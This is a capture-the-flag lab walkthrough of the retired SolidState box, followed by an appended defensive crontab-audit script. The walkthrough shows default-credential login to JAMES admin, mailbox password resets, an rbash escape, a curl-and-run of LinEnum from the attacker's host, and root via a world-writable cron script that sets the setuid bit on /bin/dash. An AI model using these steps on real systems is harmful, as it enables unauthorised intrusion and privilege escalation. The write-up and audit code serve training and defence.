This is the write-up for the box SolidState, which was retired on 27 January 2018. My IP address was 10.10.14.23 while I did this.
Let's put this in our hosts file:
10.10.10.51 solidstate.htb
Starting with an Nmap scan:
nmap -sC -sV -o nmap/solidstate.nmap 10.10.10.51
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.23 [10.10.14.23]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Full TCP port range scan:
nmap -p- -T5 -o nmap/ss-allports.nmap 10.10.10.51
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
Scanning for vulnerabilities on these services:
nmap -p 22,25,80,110,119,4555 -sC -sV -o nmap/ss-vulns.nmap --script vuln 10.10.10.51
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
25/tcp open smtp JAMES smtpd 2.3.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
| Found the following possible CSRF vulnerabilities:
(...)
110/tcp open pop3 JAMES pop3d 2.3.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
119/tcp open nntp JAMES nntpd (posting ok)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
4555/tcp open james-admin JAMES Remote Admin 2.3.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
The web page looks like a generic company website that offers security consulting services. All the pages are HTML and there is a contact form that seems to do nothing after submitting.
When connecting to port 4555 with nc, it outputs JAMES Remote Administration Tool 2.3.2 and asks for a login ID and a password.
After trying some default credentials, the login ID root with the password root turns out to be valid.
The HELP command shows what we can do.
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
It is possible to change the password of these users:
setpassword mailadmin newpass1
Password for mailadmin reset
As some mail ports are open, let's try to access these users' mailboxes with any mail client such as Evolution. After resetting the passwords of all users, only the user mindy has an interesting email, with the subject "Your Access":
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
The credentials work on SSH and we are logged in as mindy:
ssh mindy@10.10.10.51
In the home folder there is a bin folder, but trying to change into it gives "-rbash: cd: restricted", which means that mindy is in a restricted bash. Looking at /etc/passwd confirms that:
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
To get out of it we can pass a command to SSH so that it is executed instead of the login shell:
ssh mindy@10.10.10.51 bash
This executes bash directly, so the user is no longer restricted and can run any command. Let's run a Linux enumeration script such as LinEnum to map the attack surface of the box (the script is fetched from our own machine at 10.10.14.23, where it is assumed to be served over HTTP):
curl http://10.10.14.23/LinEnum.sh -o LinEnum.sh
bash LinEnum.sh -t
After analyzing the output, there is the file /opt/tmp.py, which has write and execute permissions for everyone. The Python script just cleans the /tmp directory. As it is writable by anyone, we can put our own commands in there:
#!/usr/bin/env python
import os
import sys
try:
    # the original cleanup code is replaced with a harmless test command
    os.system('/usr/bin/touch /tmp/test')
except:
    sys.exit()
After saving this and waiting a couple of minutes, a cron job executes the script and creates the file /tmp/test, which is owned by root. Now change the script to set the setuid bit on a binary that spawns a shell, so we can run it with root permissions:
os.system('chmod 4755 /bin/dash')
After the cron job runs, the setuid bit is set on /bin/dash and we can execute dash.
This starts a shell in which the effective user ID (EUID) is root, and the box is done!
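A defender-side check for the misconfiguration used above, added here as an example that is not part of the write-up: it parses /etc/crontab-style lines and reports any absolute path in a job that is group- or world-writable, the property that made /opt/tmp.py exploitable. The function names and the sample crontab built in demo() are constructed.

```python
"""Audit /etc/crontab-style entries for scripts that other users can modify.
Added example, not code from the write-up or the box; it models the SolidState finding
(a root cron job running the world-writable /opt/tmp.py). Only the system-crontab layout
(m h dom mon dow user command) is parsed; the demo scenario at the bottom is constructed.
"""
import os
import stat
import tempfile

def parse_system_crontab(text):
    """Yield (user, command) per job line, skipping blanks, comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#') or '=' in line.split()[0]:
            continue
        if line.startswith('@'):              # @daily user command
            fields = line.split(None, 2)
            if len(fields) == 3:
                yield fields[1], fields[2]
        else:                                 # m h dom mon dow user command
            fields = line.split(None, 6)
            if len(fields) == 7:
                yield fields[5], fields[6]

def audit_crontab(text):
    """Return (user, path, mode) for each absolute path in a job that is group- or world-writable."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        for tok in cmd.split():               # check every path token: interpreter, script, wrapper
            if not tok.startswith('/'):
                continue
            try:
                st = os.stat(tok)
            except OSError:
                continue                      # dangling path: nothing here to overwrite
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((user, tok, stat.S_IMODE(st.st_mode)))
    return findings

def demo():
    """Constructed scenario: a 0777 cleanup script like /opt/tmp.py next to a 0755 one."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, 'tmp.py'), os.path.join(d, 'backup.sh')
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, 'w') as f:
            f.write('#!/usr/bin/env python\n')
        os.chmod(path, mode)
    crontab = ("SHELL=/bin/sh\n# m h dom mon dow user command\n"
               f"*/3 * * * * root python {bad}\n@daily root {good}\n")
    return audit_crontab(crontab)
```

On a real host, feed audit_crontab() the contents of /etc/crontab and each file under /etc/cron.d; demo() only exercises the check against the constructed scenario.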